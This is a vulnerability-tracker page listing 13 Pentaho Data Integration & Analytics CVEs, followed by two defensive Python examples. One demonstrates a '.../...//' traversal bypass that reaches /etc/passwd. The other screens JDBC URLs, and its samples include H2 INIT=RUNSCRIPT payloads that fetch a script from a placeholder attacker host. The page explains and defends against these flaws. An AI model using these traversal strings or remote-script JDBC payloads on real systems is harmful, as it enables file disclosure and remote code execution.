VYPR

Pentaho Data Integration & Analytics

by Hitachi

CVEs (13)

  • CVE-2025-11159 | Critical | May 13, 2026
    risk 0.59 | cvss 9.1 | epss 0.00

    All versions of Hitachi Vantara Pentaho Data Integration & Analytics contain a JDBC driver for H2 databases that is vulnerable to external script execution when a new connection is created by a data source administrator.

  • CVE-2025-11158 | Critical | Mar 10, 2026
    risk 0.59 | cvss 9.1 | epss 0.00

    Hitachi Vantara Pentaho Data Integration & Analytics versions before 10.2.0.6, including 9.3.x and 8.3.x, do not restrict Groovy scripts in new PRPT reports published by users, allowing insertion of arbitrary scripts and leading to remote code execution (RCE).

  • CVE-2025-0756 | Critical | Apr 16, 2025
    risk 0.59 | cvss 9.1 | epss 0.01

    Overview: The product receives input from an upstream component, but it does not restrict or incorrectly restricts the input before it is used as an identifier for a resource that may be outside the intended sphere of control. (CWE-99) Description: …

  • CVE-2024-5706 | High | Feb 19, 2025
    risk 0.58 | cvss 8.8 | epss 0.01

    The product receives input from an upstream component, but it does not restrict or incorrectly restricts the input before it is used as an identifier for a resource that may be outside the intended sphere of control. (CWE-99) Hitachi Vantara Pentaho Data Integration &…

  • CVE-2024-28981 | High | Sep 12, 2024
    risk 0.55 | cvss 8.5 | epss 0.00

    Hitachi Vantara Pentaho Data Integration & Analytics versions before 10.1.0.0 and 9.3.0.8, including 8.3.x, disclose database passwords when searching metadata injectable fields.

  • CVE-2026-2253 | High | May 27, 2026
    risk 0.50 | cvss 7.7 | epss 0.00

    Hitachi Vantara Pentaho Data Integration & Analytics versions before 10.2.0.7 and 11.0.0.0, including 9.3.x and 8.3.x, do not prevent certain XML parsers from resolving external entities.

  • CVE-2025-24908 | Medium | Apr 16, 2025
    risk 0.44 | cvss 6.8 | epss 0.00

    Overview: The product uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize '.../...//' (doubled triple dot slash) sequences that can resolve to a location that is outside of that directory.…

  • CVE-2025-24907 | Medium | Apr 16, 2025
    risk 0.44 | cvss 6.8 | epss 0.00

    Overview: The product uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize '.../...//' (doubled triple dot slash) sequences that can resolve to a location that is outside of that directory.…

  • CVE-2026-2254 | Medium | May 27, 2026
    risk 0.41 | cvss 6.3 | epss 0.00

    Hitachi Vantara Pentaho Data Integration & Analytics versions before 10.2.0.6 and 11.0.0.0, including 9.3.x and 8.3.x, do not apply ACLs on certain API endpoints related to platform mail notifications.

  • CVE-2024-37362 | Medium | Feb 20, 2025
    risk 0.41 | cvss 6.3 | epss 0.00

    The product transmits or stores authentication credentials, but it uses an insecure method that is susceptible to unauthorized interception and/or retrieval. (CWE-522) Hitachi Vantara Pentaho Data Integration & Analytics versions before 10.2.0.0 and 9.3.0.8, including…

  • CVE-2026-2255 | Medium | May 27, 2026
    risk 0.28 | cvss 4.3 | epss 0.00

    Hitachi Vantara Pentaho Data Integration & Analytics versions before 10.2.0.6 and 11.0.0.0, including 9.3.x and 8.3.x, expose Hadoop cluster credentials in plain text through the Cluster Test API. Although the user should not see those explicitly, the defect is mitigated by…

  • CVE-2023-5617 | Feb 28, 2024
    risk 0.00 | cvss (none listed) | epss 0.00

    Hitachi Vantara Pentaho Data Integration & Analytics versions before 10.1.0.0 and 9.3.0.6, including 9.5.x and 8.3.x, display the version of Tomcat when a server error is encountered.

  • CVE-2023-3517 | Dec 12, 2023
    risk 0.00 | cvss (none listed) | epss 0.01

    Hitachi Vantara Pentaho Data Integration & Analytics versions before 9.5.0.1 and 9.3.0.5, including 8.3.x, do not restrict JNDI identifiers during the creation of XActions, allowing control of system level data sources.
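CVE-2025-24908 and CVE-2025-24907 above both describe the CWE-22 variant in which a path filter removes '../' once, so the doubled-triple-dot sequence '.../...//' collapses into a fresh '../' only after the filter has run. The Python below is an added example, not code from this page, from Hitachi Vantara or from Pentaho: the base directory, the naive one-pass filter and the sample inputs are constructed for the demonstration. It shows the bypass against the naive filter and the check a practitioner wants instead, which is to normalize the complete candidate path first and then verify it is still inside the base directory.

```python
import posixpath
from typing import Optional

# Constructed base directory for the demo; not taken from the advisory.
REPORTS_DIR = "/srv/pentaho/reports"


def naive_sanitize(user_path: str) -> str:
    """The kind of filter the CWE-22 '.../...//' pattern defeats: strip '../' once.

    ".../...//" -> the two inner "../" occurrences are removed, and the
    leftover characters re-form a single "../" that the filter never sees.
    """
    return user_path.replace("../", "")


def naive_resolve(base: str, user_path: str) -> str:
    """What the vulnerable code effectively does: sanitize, join, then normalize."""
    return posixpath.normpath(posixpath.join(base, naive_sanitize(user_path)))


def safe_resolve(base: str, user_path: str) -> Optional[str]:
    """Normalize the full path first, then enforce containment; never modify-then-trust.

    Returns the resolved absolute path, or None if the request must be rejected.
    """
    base_norm = posixpath.normpath(base)
    # Absolute user paths would replace the base entirely under join().
    if user_path.startswith("/"):
        return None
    full = posixpath.normpath(posixpath.join(base_norm, user_path))
    # "..." is an ordinary name to normpath, so it stays under base;
    # a real ".." that climbs above base fails this prefix test.
    if full != base_norm and not full.startswith(base_norm + "/"):
        return None
    return full


if __name__ == "__main__":
    # Constructed attack string: three '.../...//' chunks become '../../../' after the naive strip.
    bypass = ".../...//.../...//.../...//etc/passwd"
    print("naive filter output :", naive_sanitize(bypass))          # ../../../etc/passwd
    print("naive resolver      :", naive_resolve(REPORTS_DIR, bypass))  # /etc/passwd (escaped)
    print("safe resolver       :", safe_resolve(REPORTS_DIR, bypass))   # stays under REPORTS_DIR
    print("plain '..' request  :", safe_resolve(REPORTS_DIR, "../etc/passwd"))  # None (rejected)
    print("legitimate request  :", safe_resolve(REPORTS_DIR, "monthly/sales.prpt"))
```

The design point is ordering: any transformation of the input (stripping, decoding, collapsing slashes) must happen before the containment check, and the check must run on the final normalized path, because a single-pass removal is itself a transformation that can manufacture the very sequence it was meant to remove.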
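CVE-2025-11159 above says the bundled H2 JDBC driver can be made to execute an external script when a data-source administrator creates a new connection. The page does not say which part of the H2 connection URL is involved; this added example assumes the documented H2 INIT= connection setting, which runs the given SQL on every new connection and accepts RUNSCRIPT FROM a remote URL. It is not code from the page, from Hitachi Vantara or from Pentaho; the driver allowlist is hypothetical policy and the JDBC URLs are constructed. It shows how an application can screen admin-supplied JDBC URLs before they ever reach the driver, including percent-encoded keys that a naive substring match would miss.

```python
from typing import Dict, FrozenSet, List, Tuple
from urllib.parse import unquote

# Hypothetical policy: drivers a data-source administrator may register.
DEFAULT_ALLOWED_DRIVERS: FrozenSet[str] = frozenset({"postgresql", "mysql", "sqlserver", "oracle"})

# H2 settings that make the driver execute SQL at connect time (assumption about
# the mechanism; documented H2 behaviour, not stated by the advisory):
# INIT=<sql> runs on every new connection, and the SQL may contain
# RUNSCRIPT FROM '<url>' which fetches the script from a remote location.
H2_CONNECT_TIME_SETTINGS: FrozenSet[str] = frozenset({"INIT"})


def split_jdbc_url(url: str) -> Tuple[str, str, Dict[str, str]]:
    """Split jdbc:<driver>:<body>;KEY=value;... into (driver, body, settings).

    Setting keys are upper-cased because H2 treats them case-insensitively.
    """
    if not url.lower().startswith("jdbc:"):
        raise ValueError("not a JDBC URL")
    driver, _, remainder = url[5:].partition(":")
    body, *params = remainder.split(";")
    settings: Dict[str, str] = {}
    for param in params:
        key, _, value = param.partition("=")
        if key.strip():
            settings[key.strip().upper()] = value.strip()
    return driver.lower(), body, settings


def check_jdbc_url(url: str, allowed_drivers: FrozenSet[str] = DEFAULT_ALLOWED_DRIVERS) -> List[str]:
    """Return the list of reasons to reject the URL; an empty list means it passed.

    The URL is percent-decoded before parsing so that an encoded key such as
    %49NIT cannot slip past a check that only looks for the literal text INIT.
    """
    problems: List[str] = []
    try:
        driver, _body, settings = split_jdbc_url(unquote(url))
    except ValueError as exc:
        return [str(exc)]
    if driver not in allowed_drivers:
        problems.append(f"driver '{driver}' is not on the allowlist")
    if driver == "h2":
        for key in settings:
            if key in H2_CONNECT_TIME_SETTINGS:
                problems.append(f"H2 setting {key}= executes SQL at connect time")
    return problems


if __name__ == "__main__":
    # Constructed sample URLs; attacker.example is a placeholder host.
    samples = [
        "jdbc:postgresql://db.internal:5432/warehouse",
        "jdbc:h2:mem:test;INIT=RUNSCRIPT FROM 'http://attacker.example/evil.sql'",
        "jdbc:h2:mem:test;%49NIT=RUNSCRIPT FROM 'http://attacker.example/evil.sql'",
        "mysql://db.internal/warehouse",
    ]
    for sample in samples:
        verdict = check_jdbc_url(sample) or ["ok"]
        print(f"{sample}\n    -> {'; '.join(verdict)}")
```

The allowlist is the primary control: if H2 is not needed as a data source at all, no H2 URL should be accepted in the first place, and the INIT= check only matters for deployments that must keep H2 enabled for legitimate in-memory or file databases.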